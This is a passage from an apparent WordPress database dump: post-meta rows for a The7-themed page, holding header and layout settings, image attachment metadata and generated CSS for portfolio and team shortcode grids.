.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(27775,3709,'_edit_lock','1692139042:1'),
(27776,3710,'_wp_attached_file','2023/02/main.jpg'),
(27777,3710,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:263;s:6:\"height\";i:211;s:4:\"file\";s:16:\"2023/02/main.jpg\";s:8:\"filesize\";i:25183;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"main-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8693;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27778,3709,'_thumbnail_id','3710'),
(27779,3709,'_edit_last','1'),
(27780,3709,'_wpb_vc_js_status','true'),
(27781,3709,'_dt_sidebar_position','disabled'),
(27782,3709,'_dt_sidebar_widgetarea_id','sidebar_1'),
(27783,3709,'_dt_sidebar_hide_on_mobile','0'),
(27784,3709,'_dt_footer_show','1'),
(27785,3709,'_dt_footer_widgetarea_id','sidebar_2'),
(27786,3709,'_dt_footer_hide_on_mobile','0'),
(27787,3709,'_dt_header_title','fancy'),
(27788,3709,'_dt_header_background','normal'),
(27789,3709,'_dt_header_background_below_slideshow','disabled'),
(27790,3709,'_dt_header_transparent_bg_color_scheme','light'),
(27791,3709,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(27792,3709,'_dt_header_transparent_top_bar_bg_opacity','25'),
(27793,3709,'_dt_header_transparent_bg_color','#000000'),
(27794,3709,'_dt_header_transparent_bg_opacity','50'),
(27795,3709,'_dt_header_disabled_background','normal'),
(27796,3709,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(27797,3709,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(27798,3709,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(27799,3709,'_dt_header_disabled_transparent_bg_color','#000000'),
(27800,3709,'_dt_header_disabled_transparent_bg_opacity','50'),
(27801,3709,'_dt_page_overrides_top_margin',''),
(27802,3709,'_dt_page_overrides_right_margin',''),
(27803,3709,'_dt_page_overrides_bottom_margin',''),
(27804,3709,'_dt_page_overrides_left_margin',''),
(27805,3709,'_dt_mobile_page_padding_top',''),
(27806,3709,'_dt_mobile_page_padding_right',''),
(27807,3709,'_dt_mobile_page_padding_bottom',''),
(27808,3709,'_dt_mobile_page_padding_left',''),
(27809,3709,'_dt_fancy_header_layout_heading',''),
(27810,3709,'_dt_fancy_header_title_aligment','center'),
(27811,3709,'_dt_fancy_header_height','300'),
(27812,3709,'_dt_fancy_header_padding-top','0px'),
(27813,3709,'_dt_fancy_header_padding-bottom','0px'),
(27814,3709,'_dt_fancy_header_breadcrumbs_heading',''),
(27815,3709,'_dt_fancy_header_breadcrumbs','disabled'),
(27816,3709,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(27817,3709,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(27818,3709,'_dt_fancy_header_title_heading',''),
(27819,3709,'_dt_fancy_header_title_mode','custom'),
(27820,3709,'_dt_fancy_header_title',''),
(27821,3709,'_dt_fancy_header_title_font_size','30'),
(27822,3709,'_dt_fancy_header_title_line_height','36'),
(27823,3709,'_dt_fancy_header_text_transform','none'),
(27824,3709,'_dt_fancy_header_title_color_mode','color'),
(27825,3709,'_dt_fancy_header_title_color','#1e73be'),
(27826,3709,'_dt_fancy_header_subtitle_heading',''),
(27827,3709,'_dt_fancy_header_subtitle',''),
(27828,3709,'_dt_fancy_header_subtitle_font_size','18'),
(27829,3709,'_dt_fancy_header_subtitle_line_height','26'),
(27830,3709,'_dt_fancy_header_subtitle_text_transform','none'),
(27831,3709,'_dt_fancy_header_subtitle_color_mode','color'),
(27832,3709,'_dt_fancy_header_subtitle_color','#ffffff'),
(27833,3709,'_dt_fancy_header_bg_heading',''),
(27834,3709,'_dt_fancy_header_bg_color','#222222'),
(27835,3709,'_dt_fancy_header_bg_image_origin','featured_image'),
(27836,3709,'_dt_fancy_header_bg_image','a:0:{}'),
(27837,3709,'_dt_fancy_header_bg_repeat','no-repeat'),
(27838,3709,'_dt_fancy_header_bg_position_x','center'),
(27839,3709,'_dt_fancy_header_bg_position_y','center'),
(27840,3709,'_dt_fancy_header_bg_fullscreen','1'),
(27841,3709,'_dt_fancy_header_bg_overlay','0'),
(27842,3709,'_dt_fancy_header_overlay_color','#000'),
(27843,3709,'_dt_fancy_header_bg_overlay_opacity','50'),
(27844,3709,'_dt_fancy_header_scroll_effect','default'),
(27845,3709,'_dt_fancy_header_bg_parallax','0.5'),
(27846,3709,'_dt_fancy_header_responsiveness_heading',''),
(27847,3709,'_dt_fancy_header_responsiveness','disabled'),
(27848,3709,'_dt_fancy_header_responsiveness_switch','778px'),
(27849,3709,'_dt_fancy_header_responsive_height','70'),
(27850,3709,'_dt_fancy_header_responsive_font_size','30'),
(27851,3709,'_dt_fancy_header_responsive_title_line_height','38'),
(27852,3709,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(27853,3709,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(27854,3709,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(27855,3709,'_dt_project_options_back_button',''),
(27856,3709,'_dt_project_options_show_link',''),
(27857,3709,'_dt_project_options_link',''),
(27858,3709,'_dt_project_options_link_target',''),
(27859,3709,'_dt_project_options_link_name',''),
(27860,3709,'_dt_project_options_hide_thumbnail','1'),
(27861,3709,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(27862,3709,'_dt_project_options_related_mode','same'),
(27863,3709,'_dt_project_options_preview','normal'),
(27864,3709,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2023/02/main.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #1e73be;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(27866,3709,'the7_shortcodes_dynamic_css','a:2:{s:32:\"edd1e9496df9abd9d4c61916c1ebb866\";s:6509:\".dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866  .team-media {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-edd1e9496df9abd9d4c61916c1ebb866.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  